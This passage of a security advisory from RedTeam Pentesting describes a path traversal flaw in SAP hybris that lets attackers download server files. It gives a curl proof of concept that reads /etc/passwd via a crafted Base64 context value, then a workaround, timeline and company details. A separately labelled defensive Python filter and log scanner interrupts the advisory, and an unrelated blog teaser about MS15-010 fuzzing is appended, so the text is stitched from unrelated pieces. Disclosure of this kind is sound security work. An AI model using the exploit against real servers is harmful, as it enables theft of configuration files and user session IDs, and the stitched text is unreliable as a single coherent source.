bin:x:2:2:bin:/bin:/bin/sh
[...]

The size included in the third field of the data structure is used to
limit the number of bytes returned for a file. As it can be modified by
attackers, files of any size with arbitrary content can be downloaded,
provided the path to the file on the server is known. This enables
attackers to read, among others, the environment of the current process
at /proc/self/environ and the list of memory maps including the full
paths to loaded libraries at /proc/self/maps. This way, knowledge about
a particular instance of hybris can be gathered. Afterwards it is
possible to access configuration files like "local.properties" and the
log files for shop orders which also contain the current session-IDs of
users. Furthermore, the Java bytecode of hybris can be downloaded and
decompiled.


Proof of Concept
================

------------------------------------------------------------------------
FILENAME=/etc/passwd
curl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \
"master|root|200000000|text/plain|../../../../../..${FILENAME}|-")
------------------------------------------------------------------------


Workaround
==========

Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.
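The context structure decoded above and the validating filter this workaround calls for, as an added Python example that is not code from the advisory or from hybris: it parses the Base64-encoded, pipe-separated fields, refuses any file name that does not stay inside the media directory, caps the size field, and runs the same check over sample access-log request lines so that requests the filter would have rejected can also be found after the fact. MEDIA_ROOT, MAX_MEDIA_BYTES, the names field1/field2 and the log lines are assumptions or constructed for the example; the two literal context values are the ones printed in the advisory.

```python
import base64
import binascii
import posixpath
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, quote, urlsplit

# Assumptions for this example (not from the advisory): the directory the
# media servlet reads from, and a cap for the otherwise unbounded size field.
MEDIA_ROOT = "/srv/hybris/data/media"
MAX_MEDIA_BYTES = 50 * 1024 * 1024


@dataclass(frozen=True)
class MediaContext:
    """The six pipe-separated fields of a decoded "context" value. The
    advisory documents size, MIME type, file name and hash; 1-2 stay opaque."""
    field1: str
    field2: str
    size: int
    mime: str
    filename: str
    version: str  # SHA-256 hex digest of one version, or "-" for the latest


def parse_context(value: str) -> MediaContext:
    """Decode a "context" parameter; raise ValueError on anything malformed
    so the caller refuses the request instead of guessing."""
    padded = value + "=" * (-len(value) % 4)  # URLs usually drop the "="
    try:
        raw = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError(f"context is not Base64/UTF-8: {exc}") from exc
    fields = raw.split("|")
    if len(fields) != 6:
        raise ValueError(f"expected 6 fields, got {len(fields)}")
    if not fields[2].isdigit():
        raise ValueError(f"size field is not numeric: {fields[2]!r}")
    return MediaContext(fields[0], fields[1], int(fields[2]),
                        fields[3], fields[4], fields[5])


def validate(ctx: MediaContext) -> Optional[str]:
    """Return None if the context may be served, else the reason to refuse.

    This is the check the workaround asks for: the file named in field 5
    must stay inside MEDIA_ROOT. Comparing the normalised path catches
    "../" sequences, absolute names and redundant separators in one rule.
    """
    name = ctx.filename
    if not name or "\x00" in name:
        return "empty file name or embedded NUL"
    # join() discards MEDIA_ROOT for an absolute name, which then fails below.
    resolved = posixpath.normpath(posixpath.join(MEDIA_ROOT, name))
    if not resolved.startswith(MEDIA_ROOT + "/"):
        return f"file name escapes media root: {name!r} -> {resolved}"
    # A production filter should also apply os.path.realpath() on the live
    # filesystem so that symlinks below MEDIA_ROOT cannot point outside it.
    if ctx.size > MAX_MEDIA_BYTES:
        return f"size field {ctx.size} exceeds {MAX_MEDIA_BYTES}"
    return None


def scan_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Apply the same validation to access-log request lines such as
    'GET /medias/redteam?context=... HTTP/1.1' and return (line, reason)
    pairs for every request the filter would have refused."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        values = parse_qs(urlsplit(parts[1]).query).get("context")
        if not values:
            continue
        try:
            reason = validate(parse_context(values[0]))
        except ValueError as exc:
            reason = str(exc)
        if reason is not None:
            findings.append((line, reason))
    return findings


def _ctx(plain: str) -> str:
    """Encode a plaintext context as the advisory's shell examples do, then
    percent-encode it so a "+" in the Base64 survives the query string."""
    return quote(base64.b64encode(plain.encode()).decode().rstrip("="))


# Constructed sample log. The first two context values are the ones printed
# in the advisory (latest-version image, then the /etc/passwd traversal).
SAMPLE_LOG = [
    "GET /medias/image.jpg?context=bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt HTTP/1.1",
    "GET /medias/redteam?context=bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 HTTP/1.1",
    "GET /medias/x?context=" + _ctx("master|root|200000000|text/plain|notes.txt|-") + " HTTP/1.1",
    "GET /medias/x?context=" + _ctx("master|root|10|text/plain|/etc/hostname|-") + " HTTP/1.1",
    "GET /robots.txt HTTP/1.1",
]
```

In a hybris deployment the same check would live in a servlet Filter registered ahead of the MediaFilter, returning an error whenever validate() gives a reason; the only part the offline example cannot do is the realpath() comparison against the real media directory, which a production filter should add so that symlinks are covered as well.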


Fix
===

Upgrade to a fixed hybris version or apply the vendor's hot fix.


Security Risk
=============

This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.


Timeline
========

2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory
           on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd
           time, RedTeam Pentesting declines
2015-02-18 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Register court: Aachen HRB 14004
Managing directors:                    Patrick Hof, Jens Liebchen

Fuzzing for MS15-010

This past Patch Tuesday Microsoft released MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution.  This patch addressed multiple privately reported vulnerabilities in win32k.sys and one publicly disclosed vulnerability in cng.sys.

Win32k.sys Diff

The first notable thing we noticed was that several handlers for TrueType instructions, @irtp_*, were touched.  While we did analyze these changes, they will not be the topic of this post.
[Figure 1: Changed functions in win32k.sys]

The next interesting thing we noticed is that _FindSystemTimer and _xxxDispatchMessage are related: the latter calls the former. We are going to take a closer look at these two functions.
more here.......http://blog.beyondtrust.com/fuzzing-for-ms15-010